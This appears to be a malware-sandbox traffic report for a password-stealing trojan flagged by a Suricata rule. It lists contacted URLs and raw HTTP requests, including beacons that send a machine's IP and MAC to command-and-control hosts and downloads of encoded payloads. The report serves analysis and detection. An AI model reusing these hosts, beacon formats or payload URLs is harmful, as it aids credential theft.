hxxp://a1363.dscg.akamai.net/pki/crl/products/WinIntPCA.crl
hxxp://a1363.dscg.akamai.net/pki/crl/products/tspca.crl
hxxp://lpvoidray.lingpao8.com/Phoenix_20150202.php?UID=00000000_00000B4B&DATE=20150410
hxxp://crl.microsoft.com/pki/crl/products/WinIntPCA.crl 87.245.216.33
hxxp://kechuang.p2ptool.com/txt/First_20140926.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/listtl_20150407141150.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=CD00E9BAA99F11C64A5F27BA8E8EC72C 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/qpqpqp_201504071411.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=943BDB56E3DD58E41FDB56A349DB6CBA 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/miniIE_150328.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=5C6AF7F6153B48B9FA2A2663E2D9B114 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 42.159.89.9
hxxp://lpvoidray.lingpao8.com/index.php?r=LPTemplar/Getinfo4SW&cpt=5527353c013a498
hxxp://kechuang.p2ptool.com/txt/listbc_20150409190211.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=692CBC266F24C5D3CF9780DA7F050725 42.159.89.9
hxxp://p1.lingpao8.com/Mule/20141125.zip 101.28.252.4
hxxp://lpvoidray.lingpao8.com/index.php?r=LPTemplar/Getinfo4GBL&cpt=55271a80013a491
hxxp://p1.lingpao8.com/Dragoon/20140618_L.zip 101.28.252.4
hxxp://kechuang.p2ptool.com/txt/listsf_20150409190438.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=C5C6AE13D23B73839E356DD658D8FFAB 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/list666_20150402170229.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED 42.159.89.9
hxxp://lpvoidray.lingpao8.com/index.php?r=LPTemplar/Getinfo4HB&cpt=55273897013a499
hxxp://kechuang.p2ptool.com/txt/ndis500_201504091903.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=535583357E136724F48460BECFCB6A6B 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 42.159.89.9
hxxp://kechuang.p2ptool.com/txt/popup_150407.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=903D61BFD6141512B2E9B93503C22AF3 42.159.89.9
www.baidu.com 180.76.3.151
p2p.lingpao8.com 210.76.58.79


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN PWS Win32/Lmir.BMQ checkin

Traffic

GET /txt/whitelist.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:37 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Y
e5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLE
Onja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9h
subAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6d
hDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMR
hz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HV
CyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 U
IxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9
AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6p
sVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgI
LxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9
Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygN
WYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55z
wjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xa
vSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4neby
iCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Ob
a8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT0
1I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1i
mxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq je
NXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTR
bs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapa
jXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<< skipped >>>


GET /txt/First_20140926.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 147468
Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT
Connection: close
ETag: "54251ebc-2400c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnIS6yH f1P2yDT7rluBqW2giD4y5yvaIirLOkqQZX
a MIbx7i/hpcIaf85gpuidXx1b3p9sFPCdGlfauukL8n3VGGCFZN cmJD9zwQCS9bOJYls
9jJp/ca4xNrNDZlI Wvl VctcLkkfUViPPzwwZ7PfTmgOKU172htBHTdk3n91KXxuX TID
ozHopeYPJWsYu/iFay305SFOdOmlvW lRm5vx/GiWkbKnm/H8aJaRsqZvlZXSZdb4BrY L
TgBilBfrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a81Tto86JwVL 37qBdmegg
XE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a8TazQ2ZSPlrxNrNDZlI WvxbsYtAnHS18TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a 
gQ7yxfKZOvtkRGcCbGyejNisBIg3iBXMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9WHnXYPN
Q7BgK4Gpapi2s/vE2s0NmUj5a qSnCa1jASD9aoTtByytZZN3m8TegecH/B8RyOgTUFbxN
rNDZlI WtwtiPSWquUIj9Gncu4pZZYMEiIQPXrL yZ4gEzkJ3TOMTazQ2ZSPlr6pKcJrWM
BIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8Ta
zQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSP
lrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
<<< skipped >>>


GET /txt/popup_150407.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=903D61BFD6141512B2E9B93503C22AF3 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 1676640
Last-Modified: Tue, 07 Apr 2015 02:55:08 GMT
Connection: close
ETag: "5523470c-199560"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WsE8FbgoIUwpwksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnKkLylKYwrte9DsLM5FucPllBqI zLItKvUi7rq2F
CBqFsOxkH2MqfSv749hq2FwRlndZ00VMyWqzJ/xxHG3la/wJfU2d3xaCkTmuEeFluFMl7A
 zf9Ag4606gmB7izB9dFky/01vE3mMTazQ2ZSPlrxNrNDZlI Wvl VctcLkkfXRSl9PrgQ
sfjPiHcrQA6UXLJiZU1pmi1zdikRvmtLe5Oy6LkFdeCINdwTSf310bhZcnJ9A2kE61ib4B
GLVKgG2JvgEYtUqAbfSFdVtCWAsM8CXlSDLG2xPrDGibnVV5VusMaJudVXlWUSYbyFUa7k
TE2s0NmUj5a1nmUDjllD1at3ugq7xe7ZbE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WsK hEE
jcLC6cTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtP/iDIiRP218
TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvLL1A4u6E4zsbEYRbm5uwDsTazQ2Z
SPlrMTh1JATqEXdpXqYSlmNk9YGRwYXr/5B62mAps5IXtyfE2s0NmUj5a qSnCa1jASD9a
oTtByytZbx9M823IT9dsbPFnfe4DzTxNrNDZlI WtwtiPSWquUIj9Gncu4pZZYH2Arlu5/
az87904euN6EzMTazQ2ZSPlr6pKcJrWMBIPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmU
j5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a2wNi2SICdTxt5q/7FrJX T02MilBFZI5BN8
9H8kzdMM1wg5aryKKMjyVskrcu QLv2/X5A7iWtC0A4 WNkI2rvOjgcZEb9rUpV5CCcbiO
bIiZ/ISzb LW24uVO0eYtw3wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uGom3ouwhi4W
<<< skipped >>>


POST /index.php?r=LPTemplar/Getinfo4GBL&cpt=55271a80013a491 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com
Content-Length: 67
Cache-Control: no-cache

c=KgP3oOnpKr2gBuE8KcsdpiqBqwHk3fYy57U8zou9Q6SPPCu4FLiel1PHPoahRVD

HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:22:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Content-Length: 79
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
55270253001a453K4p6M2rYS2xkJZuRetOUXrTBmK4-9EQVe7pjCoBdG6H29FuVQ7I14Du
lnfQ-IXa3..



POST /index.php?r=LPTemplar/Getinfo4HB&cpt=55273897013a499 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com
Content-Length: 67
Cache-Control: no-cache

c=vspRJyBosa2r--IS0J8JXK4kkxGXh9WDFIgKy6k5-dG0N4E0gp2vtLAFKEs7jte

HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:22:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Content-Length: 103
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
55270258001a45811SZ98BewdTLWLqrkBWUsjtpB4n06IK6VWePRo30eadzKFrnBVWTZlo
EAReolTs6YjyQvDXHswRfAeSoxl8Dhw==..



GET /txt/ndis500_201504091903.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=535583357E136724F48460BECFCB6A6B HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:23 GMT
Content-Type: text/plain
Content-Length: 340428
Last-Modified: Thu, 09 Apr 2015 11:03:30 GMT
Connection: close
ETag: "55265c82-531cc"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WuxZiU159BpcAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQw
Yd9QvPwQZJhMLtkxzc e3eegsVDHMnLF3VTot Nw KQuoOvqtrIGg25nw3LPimai8CmDE 
lWxVdvd4fM5qTZsRLY7k/nG3y7wEF98GVxqHv39AlZ5xw6sx6ohfHX1w0nOYF CoQPGMTa
zQ2ZSPlrxNrNDZlI WstAut164t3QSP79HQXUw/X92DT6wOksX3/ueM56z4EVFv6jW9w8n
Rese6sMPFlnTmEGpuI0LPmZJcnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbb2hs7W wuKsezZX
bDlu05frDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5a/b4BHB6ulTDGAkVgWBkiG
jE2s0NmUj5a8TazQ2ZSPlrvaU0Ts8W3A/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0N
mUj5a2Rn 78l1t3lxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a0
zzJiZ//c4h65fn8Ln2q1yLGKZPpXit78TazQ2ZSPlrVxHHzkU4nwsZ/mTGsYxWezoVSKWR
99Rh8ANkdTVvVnDE2s0NmUj5axJGIauKgU68P0ady7illlieAhgy7q4bOOsxw8exR9MPxN
rNDZlI WtwtiPSWquUIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI
 WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s
0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5
a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ
2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr
xNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZ
lI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE
2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoL
D oVmJamSIZgDqoYT6wCSBWT9tEjHURKqtAnVZlVfwOy7qMrSf 27YDFme2aUO BfpzeWF
XQV chY0grpy7LNlrEbarEfAqzOaV6NVCbR0RqCGByNOTmnxYwcwVJG/n4yU8vrCF 8 U1
o9sUeFyyvDGDIAzB7b6N5kHuGPehVYtqVPLM TK9KcBjSuZye48ffJh kxiOUkfFK3
<<< skipped >>>


GET /txt/listbc_20150409190211.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=692CBC266F24C5D3CF9780DA7F050725 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 682616
Last-Modified: Thu, 09 Apr 2015 11:02:13 GMT
Connection: close
ETag: "55265c35-a6a78"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLCs7GeQSgT0LMSbeMnDrAUu1dbIAT
I0j4Gf2n/Wtm3zGQ jKk SLSSdQDkzr6lD34BwEhIE2c JDrCCthcqcYoXhTwnI5uvIOmD
LO77ogTcPvj0vAEOTS2KM3D/Ns83rPsK8h3WPqVrIx6Tvs69qinQCrfrdi5sGj2Iixbna3
haAnAXFa fzAzNBqagdpW34ri3rel2Bk/muD5F8nquhgN7 jWVKxvUb4r7eD0Q2dIEgjWx
ePzgj1hKmyvaZTix/DGokvM4yG g1aLINbQ9zYQY003284uxVKHKpxuC5ov7nXOODzdemk
Zv5Hi5z7yOIAqf5Er1Bf2pSvtpVLdAVNzppOdYF4mBa7jLXBYjNIwiRFIakbdkj dUePY1
uW9XNVEYChQkG/V4ilcheu76/zbxSB3Hsw66qZF4QIwbsp9HSqBc nnbErWAENA9GG4qTo
9Xr41jyhQ rUUf4Ncw93RUoeAjJMyVNR8dipjzhBCHS1gNKVW0trKEWLe6A3RiXfUGpHzP
mJiBT9cPhB5nUX2r zsl2cdRDjCfqykUfd2aUnQZnsSAgko7Pqoc49OClLzqqnSIts0bWx
9YhkgFbQCEQzKTzUdUmcUHbq4jC2GT6hDH9lhztpiCpgQzX 2JvCrkaSulCLUrm/oQgOrK
D7NTzIX0qakYRbvxhU/ZRQzOxWLFIgz7JD72kYhDVNc5 V9WcOulX4VOOikmb06ARJATFb
ZKv/EPIwHCnP 9BFfcxdTlQW8Ad398vra7HQPLeVMxZIYZdUBd/XAG2KngIgt y/mJDaNA
XBp8BbyDPCJHh9XLBG wLO5l6be6sbAil2rnchiypBTD2arEsziIJd2BgnZuJbIcrUmrnQ
J6FA dlXW6GSIGSHXRwBugHxvOcXVMvMtdXKBXndo0YExi6UsRjgt3EvfLysizjl sN9KC
h5a30eUUx 2anRGe59gNRamNTFn38B9RF5qQWkBzMH1FHWpw1dgo iGOC3cS98vKyCP77d
 e9vf8lrfR5RTH7Zpis9xICJqzYAzVYzGmxvvz9dF5cmVi6sNlZa6SePnAJo4LdxL3y8rI
1Pq5XYpDdZKWt9HlFMftmmPeDEQl0Cc0Lei3RNVhxZTmNesq/LTZBxSdUs3rOFfLjgt3Ev
fLysjgqaijPE2H15a30eUUx 2aDEXwqM9C8FdbrvjYMsDsYLhZMXAu9UZN5sO8tYUOK7GO
C3cS98vKyH1t1ulBX2CJlrfR5RTH7ZogEW7stsQTAK4xk0Zkq9985H4GywPiHJqBsbUTcR
RkUI4LdxL3y8rIghiwJi/n6RKWt9HlFMftms ThN1Ia6ohyuo3/ba/tojRzrVb30XWmVXX
CBT9C9AlczeYVoHQgLCRUA8efad7xNQhKgwtuDlfGivWmPeidEtEZ792S6bPl9Ho67rSkj
GLBIOHwX06bV7PzNfMRv9fnCxgdOGh27T3vOvG8QhcJfl4P1jiDIaNuzmm60UeZ3py
<<< skipped >>>


GET /txt/list666_20150402170229.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:20 GMT
Content-Type: text/plain
Content-Length: 70804
Last-Modified: Thu, 02 Apr 2015 09:02:29 GMT
Connection: close
ETag: "551d05a5-11494"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROdajLffC7CLD959aZvpFi1MxqzWyClpC40sipuK
UBUb5dYzxPa5oLESSyx3yBZMgOlKHtoPdjZVIx9D7olBqj72CpVJN03q/ayQfWG73yXIEB
Zdv3aJgoiipeq/VleGRIu3PZBB1qPFSlHkCWEyyB8AEYwvOCgOmLCJRPuRnd9spjNEqzdF
fuTRC4NW2K9KLLL3Bs5u2YGlWYDyf/uCACaid87rNnir4cvH0ew Kb8qJC5lkAjmEarwYe
Hj 7BypAFAkuUHmJo4qavH5R1w5YuzX60jpH5bJUJ5yVXUqv7mrySGoNT35SYYdxXQK80C
y2Ye4WNpHcdZJSzInv8YHFs5bL7dXwVkIzok4KNaC80MLlIZn ZAVFmqspsMIxrznQ43ny
hZmM2W8RvS lP7AFDqUDlCOG vgNqx7nDxcYU3LcqIhfwGziS 4/hXs/CCrcZ2xRW2vOix
h/A8Cdi7FPqR6QaXE/v2C wDNNXL11fYi/O7vPQiEzBEu/1TrJY2EbitVEH/hq1u4GpHzP
mJiBT66/8b8jpujKIs5yl5cFbaHhqvgWZMSnm0v71xxg1NkDgdxyf09u/1sdvbb0fbd2Xt
o6wcdyW7PGgkiuFMweCMhl08cIpJj/pmdewwcYtoL0VAMM0/sSZCh80g5BeOm8vIa1fGfG
evJTMpBTJDpXIAQIxg77BQh78H70FN50CWdNqxZA2vz5IAVdX99qo/tBsOyy4gMtofGE7B
lT86bl46qwJaYJ09ZbEKz8R3KRcj1CUjn2fh/jyrYdMcVmJ5Z/Ys7dnmnSwckFj9z6jUeX
N4AgzSTJoVTaR9wmDsGCVqo/x6XtYgxqw3BdL/UrDlz72Q3MVF2ZyI6Sit zVAbOxp7keq
NA7figF/qIy055JpQ7TA49yaz8cMtKUItGvzAAUQRdSksOaEq1Q8xJK1/GDev4rQuupmbx
8Xofk7BY3WW/jAhst/enf2LfJ5 6AGBz/TQkqx6oyR9QtUMYmzTZdTcIEp78lY6IV9EN6e
94c8 AENRHzg2uVJreSgWK5xZxtsiDxM/30AwoQHEnkM4bprNii7tJzoWxCggSnvyVjohX
oGQdcz6K9/4fkqOxgQY/vulGYM3iLp/7gVm6W48TusBr9BYdG43QWBzGjzjylq2avGXDsR
5MIELn1oVu67ty8hj3EtmyyvWTGw4ed6FVb9QSypMCEhDczr1BEQ97NRHjXgnucI0P /Zo
ntjT4NdoNqnfL7nEZKcFEfQG51IfE99pjjJlZkf0087i dO/UV7uEfQG51IfE99CBdpAD9
1E50TDgMNYb5AMfUHk59/a/5wtBjnKp6q4VMtkN0tzRp5rYg7c0 dGt4FWUURQte6kabXD
C48y5elkj8Y5pxJ rhDCXbqWuBlcv6aRL1kRlKmKYMCZtPjiTZx 9BTedAlnTTHE8fYKtb
7t8da1DgzaEY6ljwwFsk9C1JTPb8Y2RJ4hj5A3r/9zgmzI8ZoRPO/gwkhlvvUNEJW5
<<< skipped >>>


GET /Phoenix_20150202.php?UID=00000000_00000B4B&DATE=20150410 HTTP/1.1
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com


HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:21:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Vary: Accept-Encoding
Content-Length: 1144
Connection: close
Content-Type: text/html
5kuNSIlJaEuFJLBz7oXYHM1EaUGNSY1JsHV-FsgXxUSMQY10tzrnENgXxTD5nI1JjUmNSY
1J4kmNSY1J/03/eLca3obTH9Qd4HS3LeIN3BWAS7Bz5a3cCtZI4HS3VeIO0zXSGNkp3A3P
nJI9zyjiFtIXkkuNSIlJa0aFJvFXyyDNeLc90g7TNeIY2THSCskP1ArJnM1IkyXUF9hJ3B
iFP94W0HDNS5MP1BfiCewWoPfdFtBwzUqTFeQX2gRcFhPX3obQcM1JkyXUF9hJ3BiFP94W
0HS3NVlMgEmNHeyM3kRcQNtVjovfGN8Y302VSY5La0aMH48baUaOeLcp3ArODtIL2USwc/
sQ0nzzGNAc7obIC94cgDXtVc8Y2obSF5Me0nWwc/sQ0nzzGNAc6njVHtgNgEiwc/sQ0nzz
GNAc-AHYGsgN2ETyKfkL3B7SFtNX2nXneLcu0gvWKewN1USwc/wL2gzQHNMNzkSwc/QX1E
Swc/sQ0nzzGNAc9nDZHO4WxAvdHIB0tzTSHeoN7ozVD9gLgEawc/AW2nxJOtEQ2BfJnIy0
tz3YGNEAaSrYC8scz0SNeLc92BjnAIk60nDYF8lEjXS3IukYzoKVJLBz6CvynNUNxQmHPp
IJjwmTFeQX2gRcFhPX3obQPvAM0nxSS41IaUaMS4oXyyDNeLc90g7TFeIY2SRcDePEkjTI
FeoWj0mMTYyIj0xTA9QJsHV5FshX0nbcHfUWzg3nEM4NgAmMP9EQ0y7NGNJBkyrSFLQJj1
fnENMdznjSQZMi0oS0CY5X0nDTHs0Y0kGTGtIUtAmNP9EQ0y7NGNJBkyrSFLBz8D2InNlA
aBqLSInNaovcSIkeaE/bSI9Ijn2JHYoAj0mOSNlLsHVtGM4KxobVHYB0tz/UFeg33BTYKt
IMzyrYnVEp8AznHJMe0nWwc/sQ0nzzGNAc6njVHtgNgEiwc/sQ0nzzGNAc-AHYGsgN2ETy
